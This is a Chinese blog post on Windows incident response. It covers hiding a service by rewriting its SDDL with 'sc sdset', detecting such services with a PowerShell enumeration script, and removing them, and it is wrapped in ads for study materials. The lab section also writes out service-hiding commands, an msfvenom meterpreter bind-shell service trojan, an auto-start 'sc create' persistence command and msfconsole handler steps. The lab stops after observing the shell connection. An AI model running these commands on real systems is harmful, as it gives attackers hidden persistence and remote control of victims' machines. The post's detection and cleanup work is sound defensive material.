【实战】服务隐藏与排查 Windows 应急响应(1)，2024年最新完整PDF

最新推荐文章于 2024-04-25 09:35:25 发布

2401_83946284

最新推荐文章于 2024-04-25 09:35:25 发布

阅读量555

点赞数 13

分类专栏： 2024年程序员学习文章标签： windows pdf

本文链接：https://blog.csdn.net/2401_83946284/article/details/137944900

版权

2024年程序员学习专栏收录该内容

267 篇文章 0 订阅

订阅专栏

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

https://learn.microsoft.com/zh-cn/windows/win32/services/service-security-and-access-rights

可以通过一些 SDDL 解析工具进行查看

https://github.com/canix1/SDDL-Converter

是一个 powershell 脚本，右键执行

将 SDDL 放到其中进行解析

这样看起来比较直观

0x03 修改服务权限设置

sc sdset "XblGameSave" "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

0x04 测试隐藏效果

1. services.msc

2. sc

sc queryex | findstr "XblGameSave"
sc query "XblGameSave"

可以看到，常规检查的时候，无法直接看到 XblGameSave

通过 sc query 指定名称查找显示的是 拒绝访问

通过 sc qc 指定名称查找能够显示出正常内容

如果常规方式看不到，应急响应人员也无法知晓该活动的名称，也就无法查询到

3. PowerShell

Get-Service | findstr "XblGameSave"
Get-Service -Name "XblGameSave"

指定名称查询都显示找不到任何服务

4. wmic

wmic service | findstr "XblGameSave"
wmic service where "Name='XblGameSave'" get Name, DisplayName, Description

5. System Informer

https://systeminformer.sourceforge.io/

Process Hacker 的升级版

也看不到

6. 注册表

可以看到，注册表能够看到该服务，此时注册表多了一项 Security

但是不只这一个注册表有 Security ，所以也不好粗暴地作为评判依据

0x05 思考排查方法

方法一枚举法

按照计划任务隐藏时候的思路，先看一下 sc query 查询不存在的服务时报错是什么

这里就可以看出区别，当然，完全可以用 sc qc 查询做对比，可能更好

这样的话，可以将注册表遍历一遍，之后获取服务名称，挨个查询，看看有没有拒绝访问的，这样就可以测试出是否存在隐藏的服务。当然，这前提是注册表有访问权限，如果攻击者额外设置了注册表权限，可以先取消注册表权限

方法二高权限查看法

这种隐藏方式无非就是谁可以看，谁不可以看，在 Linux 中，几乎所有的限制对 root 都没用，我们分析一下刚才的权限设置

这里似乎对 SYSTEM 并没有限制，那我们使用 SYSTEM 权限执行这些常规检查是否可以看到呢

0x06 枚举法

思路就是先获取注册表中服务名称，之后通过 sc query 进行查询，根据反馈进行判断

$services = Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services" | ForEach-Object { $_.PSChildName }

$maliciousServices = foreach ($service in $services) {
    $queryOutput = sc.exe query $service 2>&1

    if ($queryOutput -like "*拒绝访问*") {
        $configOutput = sc.exe qc $service

        [PSCustomObject]@{
            ServiceName = $service
            Status = "拒绝访问"
            Config = $configOutput
        }
    }
}

if ($maliciousServices) {
    Write-Host "发现以下恶意服务:"
    $maliciousServices | Format-Table -AutoSize -Property ServiceName, Status

    foreach ($service in $maliciousServices) {
        Write-Host "--------------------------------------------------"
        Write-Host "Service Name: $($service.ServiceName)"
        Write-Host "Status: $($service.Status)"
        Write-Host "Service Config:"
        $configLines = $service.Config -split "`n"
        $configLines | ForEach-Object {
            $configLine = $_.Trim()
            if ($configLine -ne "" -and $configLine -notlike "[*]*") {
                Write-Host $configLine
            }
        }
        Write-Host "--------------------------------------------------"
    }
} else {
    Write-Host "未发现恶意服务."
}

当然了，这是美化后的，如果你想简单一些，直接用下面的几行就够了

$services = Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services" | ForEach-Object { $_.PSChildName }

foreach ($service in $services) {
    $queryOutput = sc.exe query $service 2>&1

    if ($queryOutput -like "*拒绝访问*") {
        Write-Output $service
    }
}

0x07 高权限法

通过 PsExec64.exe 来获取 SYSTEM 权限

PsExec64.exe 是 SysinternalsSuite 套件中一款工具

https://learn.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suite

PsExec64.exe -i -s cmd

PsExec 似乎会导致输入法部分功能出现问题

尝试通过 SYSTEM 权限的 cmd 进行查询

sc queryex | findstr "XblGameSave"

sc 看不到隐藏的服务

尝试通过 SYSTEM 启动 services.msc

services.msc 看不到

powershell 看不到

wmic 看不到

创建低权限的用户组和新用户也不行

看来高权限法不行

0x08 删除服务

经过枚举法，已经获取到服务名称，现在通过 sc sdset 设置权限

sc sdset "XblGameSave" "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

这样就可以通过 services.msc 进行管理了

删除服务

sc delete "ServiceName"

0x09 删除注册表文件夹会怎么样

1. 创建木马

这次使用 msf 生成一个服务木马来模拟服务

msfvenom -p windows/meterpreter/bind_tcp lport=4455 -f exe-service -o bind.exe

注意，这里指定的文件类型是 exe-service ，MSF 专门为服务准备的一类木马,中文资料上提到这个事极少

2. 创建服务

sc create test binPath= "C:\Users\Administrator\Desktop\bind.exe" start= auto depend= Tcpip obj= Localsystem

创建一个名为 test 的服务，开机自启动执行木马程序，监听 4455 端口

启动服务测试一下

sc start test

3. MSF 连接木马

msfconsole -q 
use exploit/multi/handler 
set payload windows/meterpreter/bind_tcp
set rhost 10.211.55.6
set lport 4455
exploit

服务已经正常启动，关闭连接，重启受害服务器，无用户登录状态下再次尝试连接

再次获取 shell，服务自启动没问题

4. 观察 MSF 服务情况

再次重启服务器，登录后查看服务信息如下

从服务来看 test 服务已经停止了

从进程角度来看

没有主动监听shell 相关进程

通过 MSF 进行连接

服务监听是存在的

从网络层面看

可以看到 MSF 与受害主机之间的连接

通过 wmic 查看详细情况

wmic process where ProcessId=2216 get Name, ExecutablePath, CommandLine /format:list

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

没问题。